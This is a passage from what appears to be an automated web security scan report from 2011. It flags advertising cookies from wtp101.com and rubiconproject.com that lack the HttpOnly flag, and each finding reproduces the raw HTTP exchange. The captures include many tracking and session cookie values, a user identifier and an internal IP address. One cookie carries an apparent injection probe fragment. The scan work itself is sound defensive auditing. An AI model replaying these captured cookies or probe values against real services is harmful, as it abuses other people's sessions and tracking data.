GET /imp?bc=CgVvcGVueBIkMjg5MjMxMGQtNDYwYS00Y2UzLWJjMjYtNDNhMDhkZmQ1YTcxIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBH1GFLMK6OU.8QT8HNVps3f8P.gEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscfG0LluyTuhmTAJwT3iYRqhyPr7vh5Cg HTTP/1.1
Host: o-va1.wtp101.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=!1762!3105!2445!1731; opvc=!3919,CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M#,1317600201; pvmap=!3919,1317600201,ova3; tuuid=f9bdca69-e609-4297-9145-48ea56a0756c

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Mon, 03 Oct 2011 00:12:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; path=/; expires=Wed, 02 Oct 2013 00:12:58 GMT; domain=.wtp101.com
Set-Cookie: opvc=!3919,CgVvcGVueBIkMjg5MjMxMGQtNDYwYS00Y2UzLWJjMjYtNDNhMDhkZmQ1YTcxIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBH1GFLMK6OU.8QT8HNVps3f8P.gEAIAFAYIHB1dpbmRvd3M#,1317600778; path=/; expires=Wed, 02 Oct 2013 00:12:58 GMT; domain=.wtp101.com
Set-Cookie: pvmap=!3919,1317600778,ova!3919,1317600740,ova!3919,1317600698,ova!3919,1317600201,ova3; path=/; expires=Wed, 02 Oct 2013 00:12:58 GMT; domain=.wtp101.com
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Content-Length: 3709

<html><body><iframe SRC="http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va1.wtp101.com/click?bc=CgVvcGVueBIkMjg5Mj
...[SNIP]...
14.163. http://o-va3.wtp101.com/imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o-va3.wtp101.com
Path:   /imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg HTTP/1.1
Host: o-va3.wtp101.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; s=!1762!3105!2445!1731; synclock=t

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Mon, 03 Oct 2011 00:03:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; path=/; expires=Wed, 02 Oct 2013 00:03:21 GMT; domain=.wtp101.com
Set-Cookie: opvc=!3919,CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M#,1317600201; path=/; expires=Wed, 02 Oct 2013 00:03:21 GMT; domain=.wtp101.com
Set-Cookie: pvmap=!3919,1317600201,ova3!3919,1317600201,ova3; path=/; expires=Wed, 02 Oct 2013 00:03:21 GMT; domain=.wtp101.com
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Content-Length: 3709

<html><body><iframe SRC="http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3ND
...[SNIP]...
14.164. http://optimized-by.rubiconproject.com/a/7743/12359/21900-15.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7743/12359/21900-15.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7743/12359/21900-15.js?cb=0.46589411422610283 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses1=13209^2; csi1=3226251.js^2^1317599333^1317599350; ses2=13378^2&12566^1; csi2=3188003.js^1^1317599406^1317599406&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; rdk=7845/12566; ses15=13378^2&13209^2&12566^1; csi15=3188004.js^1^1317599406^1317599406&3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688; cd=false; lm="2 Oct 2011 23:50:10 GMT"

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:52:30 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7743/12359; expires=Mon, 03-Oct-2011 00:52:30 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 03-Oct-2011 00:52:30 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13378^2&13209^2]]>>&12566^46&12359^1; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=29249; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 3348

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3182366"
...[SNIP]...
14.165. http://optimized-by.rubiconproject.com/a/7743/12359/21900-2.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7743/12359/21900-2.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7743/12359/21900-2.js?cb=0.7007977575995028 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6393&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; lm="2 Oct 2011 23:50:10 GMT"; ses8=13209^1; csi8=3226247.js^1^1317599462^1317599462; ses2=13378^2&12566^2; csi2=3188003.js^2^1317599406^1317599882&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; ses15=13378^2&13209^3&12566^2&12359^1; csi15=3226249.js^3^1317599341^1317599886&3188004.js^2^1317599406^1317599881&2748761.js^1^1317599431^1317599431&3209195.js^2^1317595891^1317598688; ses1=13209^5; csi1=3226243.js^1^1317599890^1317599890&3226929.js^2^1317599456^1317599882&3226251.js^2^1317599333^1317599350; rdk=7743/12359; rdk9=0; ses9=12359^1; csi9=3154654.js^1^1317599933^1317599933

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:59:37 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7743/12359; expires=Mon, 03-Oct-2011 00:59:37 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Mon, 03-Oct-2011 00:59:37 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=13378^2&12566^2&12359^2; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=28822; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3226027.js^1^1317599977^1317599977&3188003.js^2^1317599406^1317599882&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; expires=Sun, 09-Oct-2011 23:59:37 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1808

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3226027"
...[SNIP]...
14.166. http://optimized-by.rubiconproject.com/a/7743/12359/21900-9.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7743/12359/21900-9.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7743/12359/21900-9.js?cb=0.09602085058577359 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; lm="2 Oct 2011 23:50:10 GMT"; ses8=13209^1; csi8=3226247.js^1^1317599462^1317599462; ses2=13378^2&12566^2; csi2=3188003.js^2^1317599406^1317599882&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; ses15=13378^2&13209^3&12566^2&12359^1; csi15=3226249.js^3^1317599341^1317599886&3188004.js^2^1317599406^1317599881&2748761.js^1^1317599431^1317599431&3209195.js^2^1317595891^1317598688; rdk=8154/13209; ses1=13209^5; csi1=3226243.js^1^1317599890^1317599890&3226929.js^2^1317599456^1317599882&3226251.js^2^1317599333^1317599350

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:59:37 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7743/12359; expires=Mon, 03-Oct-2011 00:59:37 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk9=0; expires=Mon, 03-Oct-2011 00:59:37 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses9=12359^2; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=28822; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 3332

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3182365"
...[SNIP]...
14.167. http://optimized-by.rubiconproject.com/a/7845/12566/22557-15.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7845/12566/22557-15.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7845/12566/22557-15.html? HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.guardian.co.uk/football/manchester-united
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; cd=false; lm="27 Sep 2011 22:12:09 GMT"; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; csi2=3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; ses2=13378^2; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses1=13209^2; csi1=3226251.js^2^1317599333^1317599350; rdk=8154/13209; ses15=13378^2&13209^2; csi15=3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:51:05 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7845/12566; expires=Mon, 03-Oct-2011 00:51:05 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 03-Oct-2011 00:51:05 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13378^2&13209^149&12566^2&12359^1; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=29334; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3188004.js^2^1317599406^1317599465&3223117.js^3^1317599464^1317599464&3226249.js^10^1317599341^1317599463&2748761.js^1^1317599431^1317599431&3209195.js^2^1317595891^1317598688; expires=Sun, 09-Oct-2011 23:51:05 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 1975

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...
14.168. http://optimized-by.rubiconproject.com/a/7845/12566/22557-2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7845/12566/22557-2.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7845/12566/22557-2.html? HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses2=13378^2&12566^1; csi2=3188003.js^1^1317599406^1317599406&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; cd=false; lm="2 Oct 2011 23:50:10 GMT"; csi15=2748761.js^1^1317599431^1317599431&3188004.js^1^1317599406^1317599406&3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688; ses15=13378^2&13209^2&12566^1&12359^1; ses1=13209^3; csi1=3226929.js^1^1317599456^1317599456&3226251.js^2^1317599333^1317599350; ses8=13209^1; csi8=3226247.js^1^1317599462^1317599462

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:58:02 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7845/12566; expires=Mon, 03-Oct-2011 00:58:02 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Mon, 03-Oct-2011 00:58:02 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=13378^2&12566^3; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=28917; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3188003.js^3^1317599406^1317599882&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; expires=Sun, 09-Oct-2011 23:58:02 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 1971

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
